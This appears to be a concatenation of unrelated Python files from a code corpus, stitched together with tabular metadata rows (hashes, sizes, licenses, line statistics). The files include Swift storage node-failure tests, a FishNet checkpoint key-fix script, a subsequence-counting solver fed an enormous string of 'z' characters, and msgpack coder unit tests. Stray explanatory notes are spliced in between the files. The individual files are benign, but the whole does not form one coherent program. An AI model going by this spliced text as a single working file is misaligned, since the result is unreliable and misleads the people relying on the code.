                                                     container)[1]])
        cpart, cnodes = self.container_ring.get_nodes(self.account, container)
        kill(self.pids[self.port2server[cnodes[1]['port']]], SIGTERM)
        client.delete_object(self.url, self.token, container, object1)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.pids[self.port2server[cnodes[1]['port']]] = \
            Popen(['swift-container-server',
                   '/etc/swift/container-server/%d.conf' %
                   ((cnodes[1]['port'] - 6001) // 10)]).pid
        sleep(2)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        # Unfortunately, the following might pass or fail, depending on the
        # position of the account server associated with the first container
        # server we had killed. If the associated one happens to be the first
        # account server, this will pass; otherwise the first account server
        # will serve the listing and not have the container.
        # self.assertIn(container, [c['name'] for c in
        #                           client.get_account(self.url, self.token)[1]])
        object2 = 'object2'
        # This will work because at least one (in this case, just one) account
        # server has to indicate the container exists for the put to continue.
        client.put_object(self.url, self.token, container, object2, 'test')
        self.assertNotIn(object1, [o['name'] for o in
                                   direct_client.direct_get_container(
                                       cnodes[0], cpart, self.account,
                                       container)[1]])
        # And, of course, our new object2 exists.
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        get_to_final_state()
        # Our container delete never "finalized" because we started using the
        # container again before the delete settled.
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # And so object2 should still exist and object1's delete should have
        # finalized.
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])

    def test_first_two_nodes_fail(self):
        container = 'container-%s' % uuid4()
        client.put_container(self.url, self.token, container)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        object1 = 'object1'
        client.put_object(self.url, self.token, container, object1, 'test')
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertIn(object1, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        cpart, cnodes = self.container_ring.get_nodes(self.account, container)
        for x in range(2):
            kill(self.pids[self.port2server[cnodes[x]['port']]], SIGTERM)
        client.delete_object(self.url, self.token, container, object1)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        for x in range(2):
            self.pids[self.port2server[cnodes[x]['port']]] = \
                Popen(['swift-container-server',
                       '/etc/swift/container-server/%d.conf' %
                       ((cnodes[x]['port'] - 6001) // 10)]).pid
        sleep(2)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # This is okay because the first node hasn't got the update that the
        # object was deleted yet.
        self.assertIn(object1, [o['name'] for o in
                                direct_client.direct_get_container(
                                    cnodes[0], cpart, self.account,
                                    container)[1]])
        # This fails because all three nodes have to indicate deletion before
        # we tell the user it worked. Since the first node 409s (it hasn't got
        # the update that the object was deleted yet), the whole request must
        # 503 (until everything is synced up, after which the delete would
        # work).
        exc = None
        try:
            client.delete_container(self.url, self.token, container)
        except client.ClientException as err:
            exc = err
        self.assertTrue(exc)
        self.assertEqual(exc.http_status, 503)
        # Unfortunately, the following might pass or fail, depending on the
        # position of the account server associated with the first container
        # server we had killed. If the associated one happens to be the first
        # account server, this will pass; otherwise the first account server
        # will serve the listing and not have the container.
        # self.assertIn(container, [c['name'] for c in
        #                           client.get_account(self.url, self.token)[1]])
        object2 = 'object2'
        # This will work because at least one (in this case, just one) account
        # server has to indicate the container exists for the put to continue.
        client.put_object(self.url, self.token, container, object2, 'test')
        # First node still doesn't know object1 was deleted yet; this is okay.
        self.assertIn(object1, [o['name'] for o in
                                direct_client.direct_get_container(
                                    cnodes[0], cpart, self.account,
                                    container)[1]])
        # And, of course, our new object2 exists.
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        get_to_final_state()
        # Our container delete never "finalized" because we started using the
        # container again before the delete settled.
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # And so object2 should still exist and object1's delete should have
        # finalized.
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])

    def test_last_two_nodes_fail(self):
        container = 'container-%s' % uuid4()
        client.put_container(self.url, self.token, container)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        object1 = 'object1'
        client.put_object(self.url, self.token, container, object1, 'test')
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertIn(object1, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        cpart, cnodes = self.container_ring.get_nodes(self.account, container)
        for x in (1, 2):
            kill(self.pids[self.port2server[cnodes[x]['port']]], SIGTERM)
        client.delete_object(self.url, self.token, container, object1)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        for x in (1, 2):
            self.pids[self.port2server[cnodes[x]['port']]] = \
                Popen(['swift-container-server',
                       '/etc/swift/container-server/%d.conf' %
                       ((cnodes[x]['port'] - 6001) // 10)]).pid
        sleep(2)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   direct_client.direct_get_container(
                                       cnodes[0], cpart, self.account,
                                       container)[1]])
        # This fails because all three nodes have to indicate deletion before
        # we tell the user it worked. Since the first node 409s (it hasn't got
        # the update that the object was deleted yet), the whole request must
        # 503 (until everything is synced up, after which the delete would
        # work).
        exc = None
        try:
            client.delete_container(self.url, self.token, container)
        except client.ClientException as err:
            exc = err
        self.assertTrue(exc)
        self.assertEqual(exc.http_status, 503)
        # Unfortunately, the following might pass or fail, depending on the
        # position of the account server associated with the first container
        # server we had killed. If the associated one happens to be the first
        # account server, this will pass; otherwise the first account server
        # will serve the listing and not have the container.
        # self.assertIn(container, [c['name'] for c in
        #                           client.get_account(self.url, self.token)[1]])
        object2 = 'object2'
        # This will work because at least one (in this case, just one) account
        # server has to indicate the container exists for the put to continue.
        client.put_object(self.url, self.token, container, object2, 'test')
        self.assertNotIn(object1, [o['name'] for o in
                                   direct_client.direct_get_container(
                                       cnodes[0], cpart, self.account,
                                       container)[1]])
        # And, of course, our new object2 exists.
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        get_to_final_state()
        # Our container delete never "finalized" because we started using the
        # container again before the delete settled.
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # And so object2 should still exist and object1's delete should have
        # finalized.
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])

    def _get_db_file_path(self, obj_dir):
        files = sorted(os.listdir(obj_dir), reverse=True)
        for filename in files:
            if filename.endswith('db'):
                return os.path.join(obj_dir, filename)

    def _get_container_db_files(self, container):
        opart, onodes = self.container_ring.get_nodes(self.account, container)
        db_files = []
        for onode in onodes:
            node_id = (onode['port'] - 6000) // 10
            device = onode['device']
            hash_str = hash_path(self.account, container)
            server_conf = readconf('/etc/swift/container-server/%s.conf' %
                                   node_id)
            devices = server_conf['app:container-server']['devices']
            obj_dir = '%s/%s/containers/%s/%s/%s/' % (devices, device, opart,
                                                      hash_str[-3:], hash_str)
            db_files.append(self._get_db_file_path(obj_dir))
        return db_files

    def test_locked_container_dbs(self):

        def run_test(num_locks, catch_503):
            container = 'container-%s' % uuid4()
            client.put_container(self.url, self.token, container)
            db_files = self._get_container_db_files(container)
            db_conns = []
            for i in range(num_locks):
                db_conn = sqlite3.connect(db_files[i])
                db_conn.execute('begin exclusive transaction')
                db_conns.append(db_conn)
            if catch_503:
                try:
                    client.delete_container(self.url, self.token, container)
                except client.ClientException as e:
                    self.assertEqual(e.http_status, 503)
            else:
                client.delete_container(self.url, self.token, container)

        pool = eventlet.GreenPool()
        try:
            with eventlet.Timeout(15):
                p = pool.spawn(run_test, 1, False)
                r = pool.spawn(run_test, 2, True)
                q = pool.spawn(run_test, 3, True)
                pool.waitall()
        except eventlet.Timeout as e:
            raise Exception(
                "The server did not return a 503 on container db locks, "
                "it just hangs: %s" % e)
if __name__ == '__main__':
    unittest.main()
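test_locked_container_dbs above provokes the 503 by holding `begin exclusive transaction` on the container databases. A standalone sketch of that SQLite locking behavior using only the standard library (the file name, timeout, and `isolation_level=None` autocommit mode are our choices, not from the test):

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), 'demo.db')

# First connection takes an exclusive lock, as the test does on a container db.
conn1 = sqlite3.connect(path, isolation_level=None)
conn1.execute('create table t (x int)')
conn1.execute('begin exclusive transaction')

# A second connection now cannot start its own exclusive transaction; after
# its (short) busy timeout it raises OperationalError: "database is locked".
conn2 = sqlite3.connect(path, timeout=0.1, isolation_level=None)
try:
    conn2.execute('begin exclusive transaction')
    locked = False
except sqlite3.OperationalError:
    locked = True

conn1.execute('rollback')  # release the lock
```

This is the condition the container server translates into a 503 response instead of hanging.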

# ELAB01/01-10.py (repo: tawanchaiii/01204111_63, WTFPL license)
s = int(input("s: "))
print(f"{s} seconds equals {s//3600} hour(s) {(s%3600)//60} minute(s) and {(s%3600)%60} second(s)")
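The f-string above derives hours, minutes, and seconds with floor division and modulo; the same arithmetic can be written with `divmod`, which is a common alternative (the function name is ours):

```python
def split_seconds(total):
    # hours = total // 3600, then the remainder splits into minutes and
    # seconds, exactly as (total % 3600) // 60 and (total % 3600) % 60 above.
    hours, rem = divmod(total, 3600)
    minutes, seconds = divmod(rem, 60)
    return hours, minutes, seconds
```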

# stan/dataset_writers/__init__.py (repo: ChristophAlt/StAn, MIT license)
from stan.dataset_writers.dataset_writer import DatasetWriter
from stan.dataset_writers.tacred import TacredDatasetWriter

# tests/utils.py (repo: EltonCN/evolvepy, MIT license)
from numpy.testing import assert_raises, assert_array_equal
def assert_not_equal(array1, array2):
    assert_raises(AssertionError, assert_array_equal, array1, array2)
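A quick usage sketch of this helper: it passes when the arrays differ and raises `AssertionError` when they are equal (the helper is repeated here so the snippet is self-contained):

```python
import numpy as np
from numpy.testing import assert_raises, assert_array_equal

def assert_not_equal(array1, array2):
    assert_raises(AssertionError, assert_array_equal, array1, array2)

# Differing arrays: the inner assert_array_equal fails, so assert_raises passes.
assert_not_equal(np.array([1, 2]), np.array([1, 3]))
```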

# test/test.py (repo: gongfan99/coupling_matrix_numpy_extension, MIT license)
import numpy as np
import couplingmatrix as cp
import CP
import timeit
normalizedFreq = np.arange(-2.5, 2.5, 0.5)
M = np.array([[0.00000,0.44140,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.44140,0.75180,0.16820,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.00000,0.16820,0.78050,0.12880,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.00000,0.00000,0.12880,0.78280,0.12080,-0.00420,-0.00840,0.00000,0.00000],
[0.00000,0.00000,0.00000,0.12080,0.79140,0.12890,0.00000,0.00000,0.00000],
[0.00000,0.00000,0.00000,-0.00420,0.12890,0.78290,0.12890,0.00000,0.00000],
[0.00000,0.00000,0.00000,-0.00840,0.00000,0.12890,0.78340,0.18000,0.00000],
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.18000,0.78280,0.46540],
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.46540,0.00000]])
S11_CP, S21_CP = CP.CM2S(M, normalizedFreq)
S11_cp, S21_cp = cp.CM2S(M, normalizedFreq)
np.testing.assert_array_equal(S11_CP, S11_cp)
np.testing.assert_array_equal(S21_CP, S21_cp)
np.allclose(S11_CP, S11_cp)
np.allclose(S21_CP, S21_cp)
setup_str = "import numpy as np; \
import CP; \
import couplingmatrix as cp; \
normalizedFreq = np.arange(-2.5, 2.5, 0.01); \
M = np.array([[0.00000,0.44140,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.44140,0.75180,0.16820,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.00000,0.16820,0.78050,0.12880,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.00000,0.00000,0.12880,0.78280,0.12080,-0.00420,-0.00840,0.00000,0.00000], \
[0.00000,0.00000,0.00000,0.12080,0.79140,0.12890,0.00000,0.00000,0.00000], \
[0.00000,0.00000,0.00000,-0.00420,0.12890,0.78290,0.12890,0.00000,0.00000], \
[0.00000,0.00000,0.00000,-0.00840,0.00000,0.12890,0.78340,0.18000,0.00000], \
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.18000,0.78280,0.46540], \
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.46540,0.00000]])"
num = 100
print(timeit.timeit('S11, S21 = CP.CM2S(M, normalizedFreq)', setup=setup_str, number=num))
print(timeit.timeit('S11, S21 = cp.CM2S(M, normalizedFreq)', setup=setup_str, number=num))

# alrogithm/subseq/a.py (repo: SwordYoung/cutprob, Artistic-2.0 license)
#!/usr/bin/env python
class Solution:

    def getresult(self, i, j):
        if (i, j) in self.dictp:
            return self.dictp[(i, j)]
        if len(self.s) - i < len(self.t) - j:
            return 0
        if j == len(self.t):
            return 1
        if i == len(self.s):
            return 0
        return None

    # @return an integer
    def numD(self):
        target = [(0, 0)]
        while target:
            i, j = target.pop()
            if (i, j) in self.dictp:
                continue
            new_sub = []
            res = 0
            if self.s[i] == self.t[j]:
                subres = self.getresult(i + 1, j + 1)
                if subres is None:
                    new_sub.append((i + 1, j + 1))
                else:
                    res += subres
            subres = self.getresult(i + 1, j)
            if subres is None:
                new_sub.append((i + 1, j))
                assert i + 1 < len(self.s)
                assert j < len(self.t)
            else:
                res += subres
            if new_sub:
                # Some subproblems are unresolved: revisit (i, j) after them.
                target.append((i, j))
                target.extend(new_sub)
            else:
                self.dictp[(i, j)] = res
        return self.dictp[(0, 0)]

    def numDistinct(self, S, T):
        self.dictp = {}
        self.s = S
        self.t = T
        return self.numD()
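The class above memoizes a top-down recursion over (i, j). For contrast, the same count of distinct subsequences can be computed bottom-up in O(len(s) * len(t)) time with a one-dimensional table (a sketch, not part of the original file):

```python
def num_distinct_iterative(s, t):
    # dp[j] = number of distinct subsequences of the prefix of s processed so
    # far that equal t[:j]; dp[0] = 1 for the empty target.
    dp = [1] + [0] * len(t)
    for ch in s:
        # Walk j backwards so each character of s only extends counts that
        # were computed before this character was considered.
        for j in range(len(t) - 1, -1, -1):
            if t[j] == ch:
                dp[j + 1] += dp[j]
    return dp[len(t)]
```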

def test(s, t):
    sol = Solution()
    res = sol.numDistinct(s, t)
    print("input:")
    print("  ", s)
    print("  ", t)
    print("res: %d" % res)

def manual_test():
    test("aabbaaabb", "aab")
test("zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
c14a7cc339c150c1cee51149473f3a35ea34ad9e | 3,990 | py | Python | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | 7 | 2019-07-24T09:02:11.000Z | 2021-08-16T08:45:21.000Z | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | null | null | null | src/FishNet/fix_checkpoint.py | smly/Landmark2019-1st-and-3rd-Place-Solution | 9839c9cbc6bec15e69e91d1d7c8be144531d5a33 | [
"Apache-2.0"
] | 1 | 2019-11-25T19:35:36.000Z | 2019-11-25T19:35:36.000Z | import torch
from src.FishNet import models
from src import utils
ckpt_path = '../src/FishNet/checkpoints/fishnet150_ckpt_welltrained.tar'
ckpt = torch.load(ckpt_path)
ckpt['state_dict'] = utils.remove_redundant_keys(ckpt['state_dict'])
model = models.__dict__[ckpt['arch']]()
# missing keys: present in the model definition but absent from the checkpoint
# unexpected keys: present in the checkpoint but absent from the model definition
# mapping
# model:302 <- 310 conv
# model:303 <- 311 bn
# model:31 <- 313 conv
# model:932 <- 940:ckpt
# model:933 <- 941:ckpt
# model:941 <- 944
ckpt['state_dict']['fish.fish.3.0.2.weight'] = ckpt['state_dict']['fish.fish.3.1.0.weight']
del ckpt['state_dict']['fish.fish.3.1.0.weight']
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.3.0.3.' + attr] = ckpt['state_dict']['fish.fish.3.1.1.' + attr]
del ckpt['state_dict']['fish.fish.3.1.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.3.1.' + attr] = ckpt['state_dict']['fish.fish.3.1.3.' + attr]
del ckpt['state_dict']['fish.fish.3.1.3.' + attr]
ckpt['state_dict']['fish.fish.9.3.2.weight'] = ckpt['state_dict']['fish.fish.9.4.0.weight']
del ckpt['state_dict']['fish.fish.9.4.0.weight']
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.3.' + attr] = ckpt['state_dict']['fish.fish.9.4.1.' + attr]
del ckpt['state_dict']['fish.fish.9.4.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.9.4.1.' + attr] = ckpt['state_dict']['fish.fish.9.4.4.' + attr]
del ckpt['state_dict']['fish.fish.9.4.4.' + attr]
# check
model.load_state_dict(ckpt['state_dict'], strict=True)
torch.save(ckpt, ckpt_path)
# ======================= fishnet150 ↑ ↓ fishnet201 ==================== #
import torch
from src.FishNet import models
from src import utils
ckpt_path = '../src/FishNet/checkpoints/fishnet201_ckpt_welltrain.tar'
ckpt = torch.load(ckpt_path)
ckpt['state_dict'] = utils.remove_redundant_keys(ckpt['state_dict'])
model = models.__dict__[ckpt['arch']]()
# missing keys: present in the model definition but absent from the checkpoint
# unexpected keys: present in the checkpoint but absent from the model definition
# mapping
# model: 302 <- 310 conv
# model: 303 <- 311 bn
# model: 31 <- 313 conv
# model: 930 <- 920 bn
# model: 933 <- 931 bn
# model: 941 <- 934 conv
# model: 932 <- 930 fc
for attr in ['weight']:
ckpt['state_dict']['fish.fish.0.0.0.shortcut.2.' + attr] = ckpt['state_dict']['fish.fish.0.0.0.shortcut.' + attr]
del ckpt['state_dict']['fish.fish.0.0.0.shortcut.' + attr]
for attr in ['weight']:
ckpt['state_dict']['fish.fish.3.0.2.' + attr] = ckpt['state_dict']['fish.fish.3.1.0.' + attr]
del ckpt['state_dict']['fish.fish.3.1.0.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.3.0.3.' + attr] = ckpt['state_dict']['fish.fish.3.1.1.' + attr]
del ckpt['state_dict']['fish.fish.3.1.1.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.3.1.' + attr] = ckpt['state_dict']['fish.fish.3.1.3.' + attr]
del ckpt['state_dict']['fish.fish.3.1.3.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.0.' + attr] = ckpt['state_dict']['fish.fish.9.2.0.' + attr]
del ckpt['state_dict']['fish.fish.9.2.0.' + attr]
for attr in ['weight', 'bias', 'running_mean', 'running_var']:
ckpt['state_dict']['fish.fish.9.3.3.' + attr] = ckpt['state_dict']['fish.fish.9.3.1.' + attr]
del ckpt['state_dict']['fish.fish.9.3.1.' + attr]
for attr in ['weight']:
ckpt['state_dict']['fish.fish.9.3.2.' + attr] = ckpt['state_dict']['fish.fish.9.3.0.' + attr]
del ckpt['state_dict']['fish.fish.9.3.0.' + attr]
for attr in ['weight', 'bias']:
ckpt['state_dict']['fish.fish.9.4.1.' + attr] = ckpt['state_dict']['fish.fish.9.3.4.' + attr]
del ckpt['state_dict']['fish.fish.9.3.4.' + attr]
# check
model.load_state_dict(ckpt['state_dict'], strict=False)
torch.save(ckpt, ckpt_path)
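The fishnet150/fishnet201 fixes above repeat the same rename-then-delete pattern on `state_dict` keys. A minimal, illustrative helper for such prefix remapping (the function name and the plain placeholder values are assumptions, not part of the original script):

```python
from collections import OrderedDict

def remap_state_dict_keys(state_dict, prefix_mapping):
    """Return a copy of state_dict with key prefixes renamed per prefix_mapping.

    Keys matching no prefix are carried over unchanged; insertion order is
    preserved so the result can be fed to load_state_dict as usual.
    """
    remapped = OrderedDict()
    for key, value in state_dict.items():
        new_key = key
        for old_prefix, new_prefix in prefix_mapping.items():
            if key.startswith(old_prefix):
                new_key = new_prefix + key[len(old_prefix):]
                break
        remapped[new_key] = value
    return remapped

# Placeholder values stand in for tensors:
sd = OrderedDict([('fish.fish.3.1.0.weight', 1),
                  ('fish.fish.3.1.1.bias', 2),
                  ('untouched.weight', 3)])
fixed = remap_state_dict_keys(sd, {
    'fish.fish.3.1.0.': 'fish.fish.3.0.2.',
    'fish.fish.3.1.1.': 'fish.fish.3.0.3.',
})
```

A table-driven remap like this keeps the old-to-new correspondence in one place instead of scattering it across rename/delete pairs.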
| 36.605505 | 117 | 0.647619 | 646 | 3,990 | 3.873065 | 0.108359 | 0.179856 | 0.2494 | 0.285372 | 0.934452 | 0.917666 | 0.917666 | 0.909672 | 0.892886 | 0.702638 | 0 | 0.060718 | 0.120802 | 3,990 | 108 | 118 | 36.944444 | 0.651938 | 0.138095 | 0 | 0.586207 | 0 | 0 | 0.456223 | 0.094583 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1d7950bc9a74274932c9f14e7726e6e81a47680 | 128 | py | Python | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | 4 | 2018-11-05T09:35:56.000Z | 2019-02-23T11:33:39.000Z | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | null | null | null | hannibal/spider/__init__.py | JorgenLiu/hannibal | 966fc27d4b1ea74323689782f70d05c22f971341 | [
"MIT"
] | null | null | null | from hannibal.spider.distribute_collector import DistributeCollector
from hannibal.spider.local_collector import LocalCollector
| 42.666667 | 68 | 0.90625 | 14 | 128 | 8.142857 | 0.642857 | 0.210526 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 128 | 2 | 69 | 64 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c1f19d11096258aa1ac415d5bdc7fda6225e2473 | 5,107 | py | Python | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | tests/test_umsgpack_coder.py | ChameleonRed/cw_msgpack_coder | bf320c36266566e95cec7ffd4ef5fe25befd675e | [
"MIT"
] | null | null | null | import unittest
import io
from cw_msgpack_coder.umsgpack_coder import UmsgpackCoder
class TestUmsgpackCoder(unittest.TestCase):
class EmptyClass:
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_empty_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.EmptyClass)
o = self.EmptyClass()
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class DictClass:
def __init__(self, a):
self.a = a
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.__dict__ != other.__dict__:
return False
return True
def test_encode_dict_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.DictClass)
o = self.DictClass(1)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
class SlotClass:
__slots__ = 'ab'
def __init__(self, ab):
self.ab = ab
def __eq__(self, other):
if getattr(self, self.__slots__) != getattr(other, self.__slots__):
return False
return True
def test_encode_single_slot_class(self):
coder = UmsgpackCoder()
coder.set_default_coder_for_class(self.SlotClass)
o = self.SlotClass(1)
s = coder.dumps(o)
o2 = coder.loads(s)
self.assertEqual(o, o2)
stream = io.BytesIO()
coder.dump(o, stream)
stream.seek(0)
o2 = coder.load(stream)
self.assertEqual(o, o2)
